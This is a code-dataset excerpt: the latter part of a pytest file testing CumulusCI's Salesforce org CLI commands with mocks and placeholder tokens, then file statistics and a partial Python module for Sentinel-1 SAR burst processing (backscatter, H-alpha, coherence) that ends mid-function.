browser_open.assert_called_once_with(start_url + expected_query)
org_config.save.assert_called_once_with()
@mock.patch("click.echo")
@mock.patch("webbrowser.open")
def test_org_browser_url_only(self, browser_open, click_echo):
start_url = "https://random-word-1234-dev-ed.cs42.my.salesforce.com//secur/frontdoor.jsp?sid=00Dorgid!longtoken"
org_config = mock.Mock()
org_config.start_url = start_url
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_browser,
runtime=runtime,
org_name="test",
path=None,
url_only=True,
)
org_config.refresh_oauth_token.assert_called_once()
browser_open.assert_not_called()
click_echo.assert_called_once_with(start_url)
org_config.save.assert_called_once_with()
@mock.patch("cumulusci.cli.org.OAuth2Client")
@responses.activate
def test_org_connect(self, oauth2client):
client_instance = mock.Mock()
client_instance.auth_code_flow.return_value = {
"instance_url": "https://instance",
"access_token": "BOGUS",
"id": "OODxxxxxxxxxxxx/user",
}
oauth2client.return_value = client_instance
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mock.Mock(
client_id="asdfasdf",
client_secret="asdfasdf",
callback_url="http://localhost:8080/callback",
)
responses.add(
method="GET",
url="https://instance/services/oauth2/userinfo",
body=b"{}",
status=200,
)
responses.add(
method="GET",
url="https://instance/services/data/v45.0/sobjects/Organization/OODxxxxxxxxxxxx",
json={
"TrialExpirationDate": None,
"OrganizationType": "Developer Edition",
"IsSandbox": False,
"InstanceName": "CS420",
"NamespacePrefix": None,
},
status=200,
)
responses.add("GET", "https://instance/services/data", json=[{"version": 45.0}])
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=False,
login_url=None,
default=True,
global_org=False,
)
runtime.check_org_overwrite.assert_called_once()
runtime.keychain.set_org.assert_called_once()
org_config = runtime.keychain.set_org.call_args[0][0]
assert org_config.expires == "Persistent"
runtime.keychain.set_default_org.assert_called_once_with("test")
@contextmanager
def mock_main_context(self):
with mock.patch( # side effects break other tests
"cumulusci.cli.cci.init_logger", mock.Mock()
), mock.patch(
"cumulusci.cli.cci.get_tempfile_logger",
mock.MagicMock(return_value=(None, "")),
), mock.patch(
"cumulusci.cli.cci.tee_stdout_stderr", mock.MagicMock()
):
yield
@mock.patch("cumulusci.cli.org.connect_org_to_keychain")
@mock.patch("cumulusci.cli.cci.CliRuntime")
def test_org_connect__sandbox(self, cli_runtime, connect_to_keychain):
mocked_connected_app = mock.Mock()
mocked_connected_app.client_id = "foo"
mocked_connected_app.client_secret = "bar"
mocked_connected_app.callback_url = "https://foo.bar.baz/"
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mocked_connected_app
cli_runtime.return_value = runtime
with self.mock_main_context():
cci.main(["cci", "org", "connect", "blah", "--sandbox"])
actual_client_config = connect_to_keychain.call_args_list[0][0][0].client_config
assert actual_client_config.auth_uri.startswith("https://test.salesforce.com/")
assert actual_client_config.token_uri.startswith("https://test.salesforce.com/")
@mock.patch("cumulusci.cli.org.connect_org_to_keychain")
@mock.patch("cumulusci.cli.cci.CliRuntime")
def test_org_connect__prod_default(self, cli_runtime, connect_to_keychain):
mocked_connected_app = mock.Mock()
mocked_connected_app.client_id = "foo"
mocked_connected_app.client_secret = "bar"
mocked_connected_app.callback_url = "https://foo.bar.baz/"
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mocked_connected_app
cli_runtime.return_value = runtime
with self.mock_main_context():
cci.main(["cci", "org", "connect", "blah"])
actual_client_config = connect_to_keychain.call_args_list[0][0][0].client_config
assert actual_client_config.auth_uri.startswith("https://login.salesforce.com/")
assert actual_client_config.token_uri.startswith(
"https://login.salesforce.com/"
)
@mock.patch("cumulusci.cli.org.OAuth2Client")
@responses.activate
def test_org_connect_expires(self, oauth2client):
client_instance = mock.Mock()
client_instance.auth_code_flow.return_value = {
"instance_url": "https://instance",
"access_token": "BOGUS",
"id": "OODxxxxxxxxxxxx/user",
}
oauth2client.return_value = client_instance
runtime = mock.Mock()
runtime.keychain.get_service.return_value = mock.Mock(
client_id="asdfasdf",
client_secret="asdfasdf",
callback_url="http://localhost:8080/callback",
)
responses.add(
method="GET",
url="https://instance/services/oauth2/userinfo",
body=b"{}",
status=200,
)
responses.add(
method="GET",
url="https://instance/services/data/v45.0/sobjects/Organization/OODxxxxxxxxxxxx",
json={
"TrialExpirationDate": "1970-01-01T12:34:56.000+0000",
"OrganizationType": "Developer Edition",
"IsSandbox": True,
"InstanceName": "CS420",
"NamespacePrefix": None,
},
status=200,
)
responses.add("GET", "https://instance/services/data", json=[{"version": 45.0}])
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=True,
login_url=None,
default=True,
global_org=False,
)
runtime.check_org_overwrite.assert_called_once()
runtime.keychain.set_org.assert_called_once()
org_config = runtime.keychain.set_org.call_args[0][0]
assert org_config.expires == date(1970, 1, 1)
runtime.keychain.set_default_org.assert_called_once_with("test")
def test_org_connect_connected_app_not_configured(self):
runtime = mock.Mock()
runtime.keychain.get_service.side_effect = ServiceNotConfigured
with pytest.raises(ServiceNotConfigured):
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=True,
login_url=None,
default=True,
global_org=False,
)
def test_org_connect_lightning_url(self):
runtime = mock.Mock()
with pytest.raises(click.UsageError, match="lightning"):
run_click_command(
org.org_connect,
runtime=runtime,
org_name="test",
sandbox=True,
login_url="https://test1.lightning.force.com/",
default=True,
global_org=False,
)
def test_org_default(self):
runtime = mock.Mock()
run_click_command(
org.org_default, runtime=runtime, org_name="test", unset=False
)
runtime.keychain.set_default_org.assert_called_once_with("test")
def test_org_default_unset(self):
runtime = mock.Mock()
run_click_command(org.org_default, runtime=runtime, org_name="test", unset=True)
runtime.keychain.unset_default_org.assert_called_once()
@mock.patch("sarge.Command")
def test_org_import(self, cmd):
runtime = mock.Mock()
result = b"""{
"result": {
"createdDate": "1970-01-01T00:00:00.000Z",
"expirationDate": "1970-01-01",
"instanceUrl": "url",
"accessToken": "access!token",
"username": "test@test.org",
"password": "password"
}
}"""
cmd.return_value = mock.Mock(
stderr=io.BytesIO(b""), stdout=io.BytesIO(result), returncode=0
)
out = []
with mock.patch("click.echo", out.append):
run_click_command(
org.org_import,
username_or_alias="test@test.org",
org_name="test",
runtime=runtime,
)
runtime.keychain.set_org.assert_called_once()
assert "Imported scratch org: access, username: test@test.org" in "".join(out)
@mock.patch("sarge.Command")
def test_org_import__persistent_org(self, cmd):
runtime = mock.Mock()
result = b"""{
"result": {
"createdDate": null,
"instanceUrl": "url",
"accessToken": "access!token",
"username": "test@test.org",
"password": "password"
}
}"""
cmd.return_value = mock.Mock(
stderr=io.BytesIO(b""), stdout=io.BytesIO(result), returncode=0
)
out = []
with mock.patch("click.echo", out.append), pytest.raises(
click.UsageError, match="cci org connect"
):
run_click_command(
org.org_import,
username_or_alias="test@test.org",
org_name="test",
runtime=runtime,
)
def test_calculate_org_days(self):
info_1 = {
"created_date": "1970-01-01T12:34:56.789Z",
"expiration_date": "1970-01-02",
}
actual_days = org.calculate_org_days(info_1)
assert 1 == actual_days
info_7 = {
"created_date": "1970-01-01T12:34:56.789+0000",
"expiration_date": "1970-01-08",
}
actual_days = org.calculate_org_days(info_7)
assert 7 == actual_days
info_14 = {
"created_date": "1970-01-01T12:34:56.000+0000",
"expiration_date": "1970-01-15",
}
actual_days = org.calculate_org_days(info_14)
assert 14 == actual_days
info_bad__no_created_date = {"expiration_date": "1970-01-15"}
actual_days = org.calculate_org_days(info_bad__no_created_date)
assert 1 == actual_days
info_bad__no_expiration_date = {"created_date": "1970-01-01T12:34:56.000+0000"}
actual_days = org.calculate_org_days(info_bad__no_expiration_date)
assert 1 == actual_days
def test_org_info(self):
org_config = mock.Mock()
org_config.config = {"days": 1, "default": True, "password": None}
org_config.expires = date.today()
org_config.latest_api_version = "42.0"
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
with mock.patch("cumulusci.cli.org.CliTable") as cli_tbl:
run_click_command(
org.org_info, runtime=runtime, org_name="test", print_json=False
)
cli_tbl.assert_called_with(
[
["Key", "Value"],
["\x1b[1mapi_version\x1b[0m", "42.0"],
["\x1b[1mdays\x1b[0m", "1"],
["\x1b[1mdefault\x1b[0m", "True"],
["\x1b[1mpassword\x1b[0m", "None"],
],
wrap_cols=["Value"],
)
org_config.save.assert_called_once_with()
def test_org_info_json(self):
class Unserializable(object):
def __str__(self):
return "<unserializable>"
org_config = mock.Mock()
org_config.config = {"test": "test", "unserializable": Unserializable()}
org_config.expires = date.today()
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
out = []
with mock.patch("click.echo", out.append):
run_click_command(
org.org_info, runtime=runtime, org_name="test", print_json=True
)
org_config.refresh_oauth_token.assert_called_once()
assert (
'{\n "test": "test",\n "unserializable": "<unserializable>"\n}'
== "".join(out)
)
org_config.save.assert_called_once_with()
@mock.patch("cumulusci.cli.org.CliTable")
def test_org_list(self, cli_tbl):
runtime = mock.Mock()
runtime.universal_config.cli__plain_output = None
org_configs = {
"test0": ScratchOrgConfig(
{
"default": True,
"scratch": True,
"date_created": datetime.now() - timedelta(days=8),
"days": 7,
"config_name": "dev",
"username": "test0@example.com",
},
"test0",
),
"test1": ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now(),
"days": 7,
"config_name": "dev",
"username": "test1@example.com",
"instance_url": "https://sneaky-master-2330-dev-ed.cs22.my.salesforce.com",
},
"test1",
),
"test2": OrgConfig(
{
"default": False,
"scratch": False,
"expires": "Persistent",
"expired": False,
"config_name": "dev",
"username": "test2@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"test2",
),
"test3": OrgConfig(
{
"default": False,
"scratch": False,
"expires": "2019-11-19",
"expired": False,
"config_name": "dev",
"username": "test3@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"test3",
),
"test4": OrgConfig(
{
"default": False,
"scratch": False,
"expired": False,
"config_name": "dev",
"username": "test4@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"test4",
),
"test5": OrgConfig(
{
"default": False,
"scratch": True,
"expires": "2019-11-19",
"expired": False,
"config_name": "dev",
"username": "test5@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"test5",
),
"test6": OrgConfig(
{
"default": False,
"scratch": True,
"expired": False,
"config_name": "dev",
"username": "test6@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"test6",
),
}
runtime.keychain.list_orgs.return_value = list(org_configs.keys())
runtime.keychain.get_org = lambda orgname: org_configs[orgname]
runtime.project_config.cache_dir = Path("does_not_possibly_exist")
runtime.keychain.get_default_org.return_value = (
"test0",
ScratchOrgConfig(
{
"default": True,
"scratch": True,
"date_created": datetime.now() - timedelta(days=8),
"days": 7,
"config_name": "dev",
"username": "test0@example.com",
},
"test0",
),
)
run_click_command(org.org_list, runtime=runtime, json_flag=False, plain=False)
scratch_table_call = mock.call(
[
["Name", "Default", "Days", "Expired", "Config", "Domain"],
["test0", True, "7", True, "dev", ""],
["test1", False, "1/7", False, "dev", "sneaky-master-2330-dev-ed.cs22"],
],
bool_cols=["Default"],
title="Scratch Orgs",
dim_rows=[0, 1],
)
connected_table_call = mock.call(
[
["Name", "Default", "Username", "Expires"],
["test2", False, "test2@example.com", "Persistent"],
["test3", False, "test3@example.com", "2019-11-19"],
["test4", False, "test4@example.com", "Unknown"],
["test5", False, "test5@example.com", "2019-11-19"],
["test6", False, "test6@example.com", "Unknown"],
],
bool_cols=["Default"],
title="Connected Orgs",
wrap_cols=["Username"],
)
assert scratch_table_call in cli_tbl.call_args_list
assert connected_table_call in cli_tbl.call_args_list
runtime.keychain.cleanup_org_cache_dirs.assert_called_once()
@mock.patch("cumulusci.cli.org.click.echo")
def test_org_list__json(self, echo):
runtime = mock.Mock()
runtime.universal_config.cli__plain_output = None
org_configs = {
"test0": ScratchOrgConfig(
{
"default": True,
"scratch": True,
"date_created": datetime.now() - timedelta(days=8),
"days": 7,
"config_name": "dev",
"username": "test0@example.com",
},
"test0",
),
"test1": ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now(),
"days": 7,
"config_name": "dev",
"username": "test1@example.com",
"instance_url": "https://sneaky-master-2330-dev-ed.cs22.my.salesforce.com",
},
"test1",
),
"test2": OrgConfig(
{
"default": False,
"scratch": False,
"expires": "Persistent",
"expired": False,
"config_name": "dev",
"username": "test2@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"test2",
),
}
runtime.keychain.list_orgs.return_value = list(org_configs.keys())
runtime.keychain.get_org = lambda orgname: org_configs[orgname]
runtime.project_config.cache_dir = Path("does_not_possibly_exist")
runtime.keychain.get_default_org.return_value = (
"test0",
ScratchOrgConfig(
{
"default": True,
"scratch": True,
"date_created": datetime.now() - timedelta(days=8),
"days": 7,
"config_name": "dev",
"username": "test0@example.com",
},
"test0",
),
)
run_click_command(org.org_list, runtime=runtime, json_flag=True, plain=False)
expected = {
"test0": {
"is_default": True,
"days": "7",
"expired": True,
"config": "dev",
"domain": "",
"is_scratch": True,
},
"test1": {
"is_default": False,
"days": "1/7",
"expired": False,
"config": "dev",
"domain": "sneaky-master-2330-dev-ed.cs22",
"is_scratch": True,
},
"test2": {"is_default": False, "is_scratch": False},
}
echo.assert_called_once_with(json.dumps(expected))
@mock.patch("click.echo")
def test_org_prune(self, echo):
runtime = mock.Mock()
runtime.keychain.list_orgs.return_value = [
"shape1",
"shape2",
"remove1",
"remove2",
"active1",
"active2",
"persistent",
]
runtime.project_config.orgs__scratch = {"shape1": True, "shape2": True}
runtime.keychain.get_org.side_effect = [
ScratchOrgConfig(
{
"default": True,
"scratch": True,
"date_created": datetime.now() - timedelta(days=8),
"days": 7,
"config_name": "dev",
"username": "test0@example.com",
},
"shape1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now(),
"days": 7,
"config_name": "dev",
"username": "test1@example.com",
},
"shape2",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime(1999, 11, 1),
"days": 7,
"config_name": "dev",
"username": "remove1@example.com",
},
"remove1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime(1999, 11, 1),
"days": 7,
"config_name": "dev",
"username": "remove2@example.com",
},
"remove2",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now() - timedelta(days=1),
"days": 7,
"config_name": "dev",
"username": "active1@example.com",
},
"active1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now() - timedelta(days=1),
"days": 7,
"config_name": "dev",
"username": "active2@example.com",
},
"active2",
),
OrgConfig(
{
"default": False,
"scratch": False,
"expires": "Persistent",
"expired": False,
"config_name": "dev",
"username": "persistent@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"persistent",
),
]
run_click_command(org.org_prune, runtime=runtime, include_active=False)
echo.assert_any_call(
"Successfully removed 2 expired scratch orgs: remove1, remove2"
)
echo.assert_any_call("Skipped org shapes: shape1, shape2")
echo.assert_any_call("Skipped active orgs: active1, active2")
runtime.keychain.remove_org.assert_has_calls(
[mock.call("remove1"), mock.call("remove2")]
)
assert runtime.keychain.remove_org.call_count == 2
@mock.patch("click.echo")
def test_org_prune_no_expired(self, echo):
runtime = mock.Mock()
runtime.keychain.list_orgs.return_value = [
"shape1",
"shape2",
"active1",
"active2",
"persistent",
]
runtime.project_config.orgs__scratch = {"shape1": True, "shape2": True}
runtime.keychain.get_org.side_effect = [
ScratchOrgConfig(
{
"default": True,
"scratch": True,
"date_created": datetime.now() - timedelta(days=8),
"days": 7,
"config_name": "dev",
"username": "test0@example.com",
},
"shape1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now(),
"days": 7,
"config_name": "dev",
"username": "test1@example.com",
},
"shape2",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now() - timedelta(days=1),
"days": 7,
"config_name": "dev",
"username": "active1@example.com",
},
"active1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now() - timedelta(days=1),
"days": 7,
"config_name": "dev",
"username": "active2@example.com",
},
"active2",
),
OrgConfig(
{
"default": False,
"scratch": False,
"expires": "Persistent",
"expired": False,
"config_name": "dev",
"username": "persistent@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"persistent",
),
]
run_click_command(org.org_prune, runtime=runtime, include_active=False)
runtime.keychain.remove_org.assert_not_called()
echo.assert_any_call("No expired scratch orgs to delete. ✨")
@mock.patch("click.echo")
def test_org_prune_include_active(self, echo):
runtime = mock.Mock()
runtime.keychain.list_orgs.return_value = [
"shape1",
"shape2",
"remove1",
"remove2",
"active1",
"active2",
"persistent",
]
runtime.project_config.orgs__scratch = {"shape1": True, "shape2": True}
runtime.keychain.get_org.side_effect = [
ScratchOrgConfig(
{
"default": True,
"scratch": True,
"days": 7,
"config_name": "dev",
"username": "test0@example.com",
},
"shape1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"days": 7,
"config_name": "dev",
"username": "test1@example.com",
},
"shape2",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime(1999, 11, 1),
"days": 7,
"config_name": "dev",
"username": "remove1@example.com",
},
"remove1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime(1999, 11, 1),
"days": 7,
"config_name": "dev",
"username": "remove2@example.com",
},
"remove2",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now() - timedelta(days=1),
"days": 7,
"config_name": "dev",
"username": "active1@example.com",
},
"active1",
),
ScratchOrgConfig(
{
"default": False,
"scratch": True,
"date_created": datetime.now() - timedelta(days=1),
"days": 7,
"config_name": "dev",
"username": "active2@example.com",
},
"active2",
),
OrgConfig(
{
"default": False,
"scratch": False,
"expires": "Persistent",
"expired": False,
"config_name": "dev",
"username": "persistent@example.com",
"instance_url": "https://dude-chillin-2330-dev-ed.cs22.my.salesforce.com",
},
"persistent",
),
]
run_click_command(org.org_prune, runtime=runtime, include_active=True)
echo.assert_any_call(
"Successfully removed 2 expired scratch orgs: remove1, remove2"
)
echo.assert_any_call(
"Successfully removed 2 active scratch orgs: active1, active2"
)
echo.assert_any_call("Skipped org shapes: shape1, shape2")
runtime.keychain.remove_org.assert_has_calls(
[
mock.call("remove1"),
mock.call("remove2"),
mock.call("active1"),
mock.call("active2"),
]
)
assert runtime.keychain.remove_org.call_count == 4
def test_org_remove(self):
org_config = mock.Mock()
org_config.can_delete.return_value = True
runtime = mock.Mock()
runtime.keychain.get_org.return_value = org_config
run_click_command(
org.org_remove, runtime=runtime, org_name="test", global_org=False
)
org_config.delete_org.assert_called_once()
runtime.keychain.remove_org.assert_called_once_with("test", False)
@mock.patch("click.echo")
def test_org_remove_delete_error(self, echo):
org_config = mock.Mock()
org_config.can_delete.return_value = True
org_config.delete_org.side_effect = Exception
runtime = mock.Mock()
runtime.keychain.get_org.return_value = org_config
run_click_command(
org.org_remove, runtime=runtime, org_name="test", global_org=False
)
echo.assert_any_call("Removing org regardless.")
def test_org_remove_not_found(self):
runtime = mock.Mock()
runtime.keychain.get_org.side_effect = OrgNotFound
with pytest.raises(
click.ClickException, match="Org test does not exist in the keychain"
):
run_click_command(
org.org_remove, runtime=runtime, org_name="test", global_org=False
)
def test_org_scratch(self):
runtime = mock.Mock()
runtime.project_config.orgs__scratch = {"dev": {"orgName": "Dev"}}
run_click_command(
org.org_scratch,
runtime=runtime,
config_name="dev",
org_name="test",
default=True,
devhub="hub",
days=7,
no_password=True,
)
runtime.check_org_overwrite.assert_called_once()
runtime.keychain.create_scratch_org.assert_called_with(
"test", "dev", 7, set_password=False
)
runtime.keychain.set_default_org.assert_called_with("test")
def test_org_scratch__not_default(self):
runtime = mock.Mock()
runtime.project_config.orgs__scratch = {"dev": {"orgName": "Dev"}}
run_click_command(
org.org_scratch,
runtime=runtime,
config_name="dev",
org_name="test",
default=False,
devhub="hub",
days=7,
no_password=True,
)
runtime.check_org_overwrite.assert_called_once()
runtime.keychain.create_scratch_org.assert_called_with(
"test", "dev", 7, set_password=False
)
def test_org_scratch_no_configs(self):
runtime = mock.Mock()
runtime.project_config.orgs__scratch = None
with pytest.raises(click.UsageError):
run_click_command(
org.org_scratch,
runtime=runtime,
config_name="dev",
org_name="test",
default=True,
devhub="hub",
days=7,
no_password=True,
)
def test_org_scratch_config_not_found(self):
runtime = mock.Mock()
runtime.project_config.orgs__scratch = {"bogus": {}}
with pytest.raises(click.UsageError):
run_click_command(
org.org_scratch,
runtime=runtime,
config_name="dev",
org_name="test",
default=True,
devhub="hub",
days=7,
no_password=True,
)
def test_org_scratch_delete(self):
org_config = mock.Mock()
runtime = mock.Mock()
runtime.keychain.get_org.return_value = org_config
run_click_command(org.org_scratch_delete, runtime=runtime, org_name="test")
org_config.delete_org.assert_called_once()
org_config.save.assert_called_once_with()
def test_org_scratch_delete_not_scratch(self):
org_config = mock.Mock(scratch=False)
runtime = mock.Mock()
runtime.keychain.get_org.return_value = org_config
with pytest.raises(click.UsageError):
run_click_command(org.org_scratch_delete, runtime=runtime, org_name="test")
@mock.patch("click.echo")
def test_org_scratch_delete_error(self, echo):
org_config = mock.Mock()
org_config.delete_org.side_effect = ScratchOrgException
runtime = mock.Mock()
runtime.keychain.get_org.return_value = org_config
run_click_command(org.org_scratch_delete, runtime=runtime, org_name="test")
assert "org remove" in str(echo.mock_calls)
@mock.patch("cumulusci.cli.org.get_simple_salesforce_connection")
@mock.patch("code.interact")
def test_org_shell(self, mock_code, mock_sf):
org_config = mock.Mock()
org_config.instance_url = "https://salesforce.com"
org_config.access_token = "TEST"
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(org.org_shell, runtime=runtime, org_name="test")
org_config.refresh_oauth_token.assert_called_once()
mock_sf.assert_any_call(runtime.project_config, org_config)
mock_sf.assert_any_call(runtime.project_config, org_config, base_url="tooling")
org_config.save.assert_called_once_with()
mock_code.assert_called_once()
assert "sf" in mock_code.call_args[1]["local"]
assert "tooling" in mock_code.call_args[1]["local"]
@mock.patch("runpy.run_path")
def test_org_shell_script(self, runpy):
org_config = mock.Mock()
org_config.instance_url = "https://salesforce.com"
org_config.access_token = "TEST"
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_shell, runtime=runtime, org_name="test", script="foo.py"
)
runpy.assert_called_once()
assert "sf" in runpy.call_args[1]["init_globals"]
assert runpy.call_args[0][0] == "foo.py", runpy.call_args[0]
@mock.patch("cumulusci.cli.ui.SimpleSalesforceUIHelpers.describe")
def test_org_shell_describe(self, describe):
org_config = mock.Mock()
org_config.instance_url = "https://salesforce.com"
org_config.access_token = "TEST"
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_shell, runtime=runtime, org_name="test", python="describe('blah')"
)
describe.assert_called_once()
assert "blah" in describe.call_args[0][0]
@mock.patch("cumulusci.cli.org.print")
def test_org_shell_mutually_exclusive_args(self, print):
org_config = mock.Mock()
org_config.instance_url = "https://salesforce.com"
org_config.access_token = "TEST"
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
with pytest.raises(Exception, match="Cannot specify both"):
run_click_command(
org.org_shell,
runtime=runtime,
org_name="foo",
script="foo.py",
python="print(config, runtime)",
)
| 35.415641
| 120
| 0.515371
| 3,868
| 40,303
| 5.126163
| 0.089969
| 0.030412
| 0.022947
| 0.02905
| 0.832812
| 0.784799
| 0.759229
| 0.725489
| 0.698003
| 0.674047
| 0
| 0.02363
| 0.366846
| 40,303
| 1,137
| 121
| 35.44679
| 0.753351
| 0.000744
| 0
| 0.646199
| 0
| 0.001949
| 0.196817
| 0.024857
| 0
| 0
| 0
| 0
| 0.073099
| 1
| 0.036062
| false
| 0.009747
| 0.023392
| 0.000975
| 0.062378
| 0.004873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e04a34a59e3d5d5a738c01319dd27d9dc1ba2da9
| 6,091
|
py
|
Python
|
ost/s1/burst2Ard.py
|
jamesemwheeler/OSTParallel
|
166fdbcbab7c71b69aa01e81f4138c8f3599967e
|
[
"MIT"
] | null | null | null |
ost/s1/burst2Ard.py
|
jamesemwheeler/OSTParallel
|
166fdbcbab7c71b69aa01e81f4138c8f3599967e
|
[
"MIT"
] | null | null | null |
ost/s1/burst2Ard.py
|
jamesemwheeler/OSTParallel
|
166fdbcbab7c71b69aa01e81f4138c8f3599967e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from os.path import join as opj
import shutil
from ost.s1 import slc2Ard
from ost.helpers import helpers as h
def slcBurst2CohPolArd(mstFile, slvFile, logFile,
swath, burstMst, burstSlv,
outDir, fileIdMst, fileIdSlv,
tmpDir, prdType='GTCgamma', outResolution=20,
removeSlvImport=False):
# import master
importMst = opj(tmpDir, '{}_import'.format(fileIdMst))
if not os.path.exists('{}.dim'.format(importMst)):
slc2Ard.slcBurstImport(mstFile, importMst, logFile, swath, burstMst)
# create HAalpha file
outH = opj(tmpDir, '{}_h'.format(fileIdMst))
slc2Ard.slcHalpha('{}.dim'.format(importMst), outH, logFile)
# geo code HAalpha
outHTc = opj(tmpDir, '{}_HAalpha'.format(fileIdMst))
slc2Ard.slcTC('{}.dim'.format(outH), outHTc, logFile, outResolution)
# move them to the outDir
shutil.move('{}.data'.format(outHTc), opj(outDir, '{}_HAalpha.data'.format(fileIdMst)))
shutil.move('{}.dim'.format(outHTc), opj(outDir, '{}_HAalpha.dim'.format(fileIdMst)))
# remove HAalpha tmp files
h.delDimap(outH)
# calibrate
outCal = opj(tmpDir, '{}_cal'.format(fileIdMst))
slc2Ard.slcBackscatter('{}.dim'.format(importMst), outCal, logFile, prdType)
# do terrain flattening in case it is selected
if prdType == 'RTC':
# define outfile
outRtc = opj(tmpDir, '{}_rtc'.format(fileIdMst))
# do the TF
slc2Ard.slcTerrainFlattening('{}.dim'.format(outCal), outRtc, logFile)
# remove tmp files
h.delDimap(outCal)
# set outRtc to outCal for further processing
outCal = outRtc
# geo code backscatter products
outTc = opj(tmpDir, '{}_BS'.format(fileIdMst))
slc2Ard.slcTC('{}.dim'.format(outCal), outTc, logFile, outResolution)
# move them to the outfolder
shutil.move('{}.data'.format(outTc), opj(outDir, '{}_BS.data'.format(fileIdMst)))
shutil.move('{}.dim'.format(outTc), opj(outDir, '{}_BS.dim'.format(fileIdMst)))
# create LS map
outLs = opj(tmpDir, '{}_LS'.format(fileIdMst))
slc2Ard.slcLSMap('{}.dim'.format(outCal), outLs, logFile, outResolution)
# move LS map to out folder
shutil.move('{}.data'.format(outLs), opj(outDir, '{}_LS.data'.format(fileIdMst)))
shutil.move('{}.dim'.format(outLs), opj(outDir, '{}_LS.dim'.format(fileIdMst)))
# remove calibrated files
h.delDimap(outCal)
# import slave
importSlv = opj(tmpDir, '{}_import'.format(fileIdSlv))
slc2Ard.slcBurstImport(slvFile, importSlv, logFile, swath, burstSlv)
# co-registration
fileList = ['{}.dim'.format(importMst), '{}.dim'.format(importSlv)]
fileList = '\'{}\''.format(','.join(fileList))
outCoreg = opj(tmpDir, '{}_coreg'.format(fileIdMst))
slc2Ard.slcCoreg(fileList, outCoreg, logFile)
# remove imports
h.delDimap(importMst)
if removeSlvImport is True:
h.delDimap(importSlv)
# calculate coherence and deburst
outCoh = opj(tmpDir, '{}_c'.format(fileIdMst))
slc2Ard.slcCoherence('{}.dim'.format(outCoreg), outCoh, logFile)
# remove coreg tmp files
h.delDimap(outCoreg)
# geocode
outTc = opj(tmpDir, '{}_coh'.format(fileIdMst))
slc2Ard.slcTC('{}.dim'.format(outCoh), outTc, logFile, outResolution)
shutil.move('{}.data'.format(outTc), opj(outDir, '{}_coh.data'.format(fileIdMst)))
shutil.move('{}.dim'.format(outTc), opj(outDir, '{}_coh.dim'.format(fileIdMst)))
# remove tmp files
h.delDimap(outCoh)
def slcBurst2PolArd(mstFile, logFile,
swath, burstMst,
outDir, fileIdMst,
tmpDir, prdType='GTCgamma', outResolution=20):
# import master
importMst = opj(tmpDir, '{}_import'.format(fileIdMst))
if not os.path.exists('{}.dim'.format(importMst)):
slc2Ard.slcBurstImport(mstFile, importMst, logFile, swath, burstMst)
# create HAalpha file
outH = opj(tmpDir, '{}_h'.format(fileIdMst))
slc2Ard.slcHalpha('{}.dim'.format(importMst), outH, logFile)
# geo code HAalpha
outHTc = opj(tmpDir, '{}_HAalpha'.format(fileIdMst))
slc2Ard.slcTC('{}.dim'.format(outH), outHTc, logFile, outResolution)
# move them to the outDir
shutil.move('{}.data'.format(outHTc), opj(outDir, '{}_HAalpha.data'.format(fileIdMst)))
shutil.move('{}.dim'.format(outHTc), opj(outDir, '{}_HAalpha.dim'.format(fileIdMst)))
# remove HAalpha tmp files
h.delDimap(outH)
# calibrate
outCal = opj(tmpDir, '{}_cal'.format(fileIdMst))
slc2Ard.slcBackscatter('{}.dim'.format(importMst), outCal, logFile, prdType)
# remove import
h.delDimap(importMst)
# do terrain flattening in case it is selected
if prdType == 'RTC':
# define outfile
outRtc = opj(tmpDir, '{}_rtc'.format(fileIdMst))
# do the TF
slc2Ard.slcTerrainFlattening('{}.dim'.format(outCal), outRtc, logFile)
# remove tmp files
